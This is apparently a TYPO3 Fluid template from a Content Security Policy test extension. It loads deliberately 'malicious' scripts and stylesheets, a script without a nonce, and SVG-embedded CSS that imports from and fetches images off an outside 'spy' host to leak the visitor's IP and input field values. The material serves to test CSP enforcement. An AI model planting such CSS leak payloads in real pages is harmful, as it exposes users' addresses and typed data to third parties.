<html xmlns:f="http://typo3.org/ns/TYPO3/CMS/Fluid/ViewHelpers"

      data-namespace-typo3-fluid="true"
>

<f:layout name="Module" />

<f:section name="Content">

    <f:variable name="jsModuleUri" value="{f:uri.resource(path:'malicious-module.js', extensionName:'CspTest')}" />
    <f:variable name="jsGoogleMapsUri" value="{f:uri.resource(path:'google-maps.js', extensionName:'CspTest')}" />

    <f:be.pageRenderer
        includeJavaScriptModules="{
            0: jsGoogleMapsUri,
            1: jsModuleUri
        }"
        includeCssFiles="{
            0: 'EXT:csp_test/Resources/Public/module.css',
            1: 'EXT:csp_test/Resources/Public/malicious.css',
            2: 'https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css'
        }"
        includeJsFiles="{
            0: 'https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js',
            1: 'https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js'
        }"
    />

    <script src="https://maps.googleapis.com/maps/api/js?key={googleMapsJsApiKey}&callback=initMap&v=weekly"
            nonce="<f:security.nonce />"
            defer>
    </script>
    <h1>CSP Test</h1>

    <div>
        <h2>Google Maps</h2>
        <div id="map"></div>

        <f:comment>
            <!-- for some reason it is not possible to use {f:security.nonce()} here - WTF! -->
        </f:comment>
        <script nonce="<f:security.nonce />">
            function initMap() {
                // The location of Uluru
                const uluru = { lat: -25.344, lng: 131.031 };
                // The map, centered at Uluru
                const map = new google.maps.Map(document.getElementById("map"), {
                    zoom: 4,
                    center: uluru,
                });
                // The marker, positioned at Uluru
                const marker = new google.maps.Marker({
                    position: uluru,
                    map: map,
                });
            }
            window.initMap = initMap;
        </script>

        <h2>Various</h2>
        <script>console.log('Malicious CSP Test')</script>
        <svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
            <style>
                /* test external IP exposure */
                @import url('/fileadmin/sniff/ip.css');
                @import url('https://spy.anyhost.it/sniff/ip.css');
                .text {
                    white-space: pre;
                    fill: purple;
                    font-family: Arial, sans-serif;
                    font-size: 14.3px;
                }
                /* test scenario when embedded inline in HTML context */
                input[value$="a"] {
                    background-image: url('https://spy.anyhost.it/sniff/a.png');
                }
                input[value$="b"] {
                    background-image: url('https://spy.anyhost.it/sniff/b.png');
                }
                input[value$="c"] {
                    background-image: url('https://spy.anyhost.it/sniff/c.png');
                }
            </style>
            <text class="text" x="10" y="10" style="stroke: orange; stroke-width: 0.75">test</text>
        </svg>
    </div>

</f:section>

</html>
